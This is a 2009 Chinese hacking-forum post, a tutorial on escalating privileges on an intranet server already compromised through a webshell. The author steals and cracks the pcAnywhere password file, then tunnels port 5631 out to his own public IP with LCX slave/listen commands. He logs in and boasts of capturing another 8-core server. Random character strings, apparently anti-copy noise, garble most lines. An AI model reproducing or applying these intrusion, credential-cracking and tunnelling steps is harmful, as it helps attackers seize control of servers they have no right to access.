|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。" \# _, I0 H4 S3 ?+ v: i$ E5 Y/ I
6 l) w9 X% @- i$ {提权方法:pcanywhere+LCX: p _2 V& f1 _0 K* c8 t# F' H5 a
4 K$ {- g0 X( N获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。* y! V% ]$ L/ ]7 U& ^6 D( M6 r* C
) ?! y+ p1 I& s0 h2 H% H在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。( A: l @5 l* X* j
% E4 d' j9 |9 U# ?9 }5 m8 h
! e" {, |/ j3 W! S# {# T; y查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
: g2 Y& G+ \- o2 {8 M% b; k# X& H8 K8 j7 ?) e6 D% M: D% W
" j% J% c& O: E( K呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。8 \7 K, `# q+ |* |
; ~+ v; t* F0 i7 ~' o9 C/ S0 t/ I: H- |8 ?
- Y7 v3 M& y, i" C
, h$ _' i, Z& N" u, y. z
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
4 Z+ @1 C3 z9 M
$ ]6 K& n1 S- ]: B' |8 K5 C
' W- x9 ^* T( OLCX的用法再简单说下:
, H2 [& n- f5 g
5 x- {5 I S2 P7 p服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
: i! P5 K3 g5 j/ a; a
& d6 [ U$ G3 K. f6 O b; ?3 J( l2 C本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
. I0 m [. F: L! K+ \! F H w5 |
0 u( J3 F5 M; L! P: W, ^1 h由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。& N( X8 v3 y4 q0 s" T, Z/ ^, q
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``6 f! n0 D1 A! L1 e( N
' T/ q, o& ?7 j7 N4 c
4 i9 `# c# }5 p7 ]9 L
/ s( e; y8 K- {2 a* b- u) f- m, d* i5 e+ b# R3 }
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。/ C6 r% a9 n4 x, ^7 \6 Z
; y2 J1 m: e' i8 T' j+ a9 c
0 X( {/ F. U1 O8 L( o \
- S" |1 D, F# c6 ? v/ Y4 p$ g+ J2 C" F0 L6 z
我们本地连接试试,输入我们刚破解的账号密码, A' Y$ C. n3 G/ C
9 J z& q) q0 G4 l
+ A: B9 _2 [. [$ l呵呵``连接成功,服务器不错,又一个8核^︵^# d% w. W2 R! M+ H0 i/ a9 }1 b
9 N O; S9 x- H, C2 J* A% F5 q0 U- T, R8 t) T* u0 d4 D
' H) L$ ~7 p+ V/ g4 a2 v0 ] |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
